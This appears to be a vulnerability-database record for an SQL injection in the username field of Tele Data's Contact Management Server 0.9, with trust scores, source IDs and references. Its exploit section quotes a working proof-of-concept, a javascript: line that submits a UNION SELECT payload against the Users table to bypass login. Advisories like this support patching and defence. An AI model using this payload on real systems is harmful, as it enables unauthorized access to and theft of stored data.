Details of VAR-E-201004-0822

ID

VAR-E-201004-0822

EDB ID

33909

TITLE

Tele Data's Contact Management Server 0.9 - 'Username' SQL Injection - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33909

DESCRIPTION

Tele Data's Contact Management Server 0.9 - 'Username' SQL Injection.. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 33909

AFFECTED PRODUCTS

vendor:	tele	model:	data's contact management server	scope:	eq	version:	0.9	Trust: 1.6
vendor:	td	model:	cms tele data's contact management server	scope:	eq	version:	0.9	Trust: 0.3

sources: BID: 39799 // EXPLOIT-DB: 33909 // EDBNET: 55304

EXPLOIT

source: https://www.securityfocus.com/bid/39799/info

The Tele Data's Contact Management Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database

Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also be affected.

The following proof-of-concept code is available:

javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

Trust: 1.0

sources: EXPLOIT-DB: 33909

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33909

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33909

TYPE

'Username' SQL Injection

Trust: 1.0

sources: EXPLOIT-DB: 33909

CREDITS

John Leitch

Trust: 0.6

sources: EXPLOIT-DB: 33909

EXTERNAL IDS

db:	BID	id:	39799	Trust: 1.9
db:	EXPLOIT-DB	id:	33909	Trust: 1.6
db:	EDBNET	id:	55304	Trust: 0.6

sources: BID: 39799 // EXPLOIT-DB: 33909 // EDBNET: 55304

REFERENCES

url:	https://www.securityfocus.com/bid/39799/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/33909/	Trust: 0.6
url:	http://teledata.qc.ca/td_cms/	Trust: 0.3

sources: BID: 39799 // EXPLOIT-DB: 33909 // EDBNET: 55304

SOURCES

db:	BID	id:	39799
db:	EXPLOIT-DB	id:	33909
db:	EDBNET	id:	55304

LAST UPDATE DATE

2022-07-27T09:41:00.430000+00:00

SOURCES UPDATE DATE

db:

BID

id:

39799

date:

2010-04-28T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	39799	date:	2010-04-28T00:00:00
db:	EXPLOIT-DB	id:	33909	date:	2010-04-28T00:00:00
db:	EDBNET	id:	55304	date:	2010-04-28T00:00:00